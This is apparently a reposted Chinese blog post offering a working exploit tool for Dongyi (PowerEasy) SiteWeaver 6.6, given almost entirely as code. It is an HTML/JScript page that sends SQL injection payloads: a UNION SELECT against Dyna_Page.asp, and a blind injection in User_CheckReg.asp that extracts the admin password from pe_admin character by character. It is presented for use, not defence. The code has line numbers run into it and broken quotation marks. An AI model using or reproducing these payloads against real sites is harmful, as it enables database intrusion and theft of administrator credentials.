动易SiteWeaver 6.6版最新漏洞利用工具,直接贴代码: 1<script>2function gb2utf8(data){3var glbEncode = [];4gb2utf8_data = data;5execScript(“gb2utf8_data = MidB(gb2utf8_data, 1)”, “VBScript”);6var t=escape(gb2utf8_data).replace(/%u/g,“”).replace(/(.{2})(.{2})/g,“%$2%$1″).replace(/%([A-Z].)%(.{2})/g,“@$1$2″);7t=t.split(“@”);8var i=0,j=t.length,k;9while(++i<j) {10k=t[i].substring(0,4);11if(!glbEncode[k]) {12gb2utf8_char = eval(“0x”+k);13execScript(“gb2utf8_char = Chr(gb2utf8_char)”, “VBScript”);14glbEncode[k]=escape(gb2utf8_char).substring(1,6);15}45 collapsed lines16t[i]=glbEncode[k]+t[i].substring(4);17}18gb2utf8_data = gb2utf8_char = null;19return unescape(t.join(“%”));20}21 22function PostData(){23var url = document.getElementById(“url”).value;24var post= document.getElementById(“post”).value;25var oXmlHttp = new ActiveXObject(“Microsoft.XMLHTTP”);26oXmlHttp.open(“POST”, url, false);27if (url.indexOf(“User_CheckReg.asp”)>0){oXmlHttp.setRequestHeader(“Content-Type”,“application/x-www-form-urlencoded”);}28oXmlHttp.send(post);29var GetResult=gb2utf8(oXmlHttp.responseBody);30if (oXmlHttp.readyState == 4) {31if (oXmlHttp.status == 200) {32document.getElementById(“getResult”).value = GetResult;33}34}35}36function Inject(i){37if (i==1){38document.getElementById(“url”).value=“http://127.0.0.1:81/pe2006/Dyna_Page.asp”;39document.getElementById(“post”).value=‘<?xml version=”1.0″ encoding=”gb2312″?><root><id>21</id><page>1</page><value>0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,DownloadUrl,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from PE_soft where softid=1|1</value></root>’;40}41else42{43document.getElementById(“url”).value=“http://127.0.0.1:81/pe2006/Reg/User_CheckReg.asp”;44document.getElementById(“post”).value=“UserName=admino’%20union%20select%201%20from%20pe_admin%20where%20username=’admin’band%20Mid(password,1,1)>’0″;45}46}47 48</script>49<BODY>50<div align=“center”>[动易SiteWeaver6.6版最新漏洞利用工具](/blog/siteweaver-66-exploit)</div>51请输入URL:<br>52<INPUT TYPE=“text” id=“url” value=“http://127.0.0.1:81/pe2006/Dyna_Page.asp” style=“width:90%;”> <br>53输入Post:<br>54<textArea id=“post” style=“width:90%; height:80;”><?xml version=“1.0″ encoding=“gb2312″?>55<root><id>21</id><page>1</page><value>0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,DownloadUrl,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from PE_soft where softid=1|1</value></root></textArea>56<div align=“center”><INPUT TYPE=“button” value=“漏洞一示例” onClick=“Inject(1);”> <INPUT TYPE=“button” value=“ 提 交 ” onClick=“PostData();”> <INPUT TYPE=“button” value=“漏洞二示例” onClick=“Inject(2);”></div>57<hr size=2 >58注入结果:<br>59<textArea id=“getResult” style=“width:90%; height:200;”></textArea>60</BODY> 作者:Cschii 转自黑客防线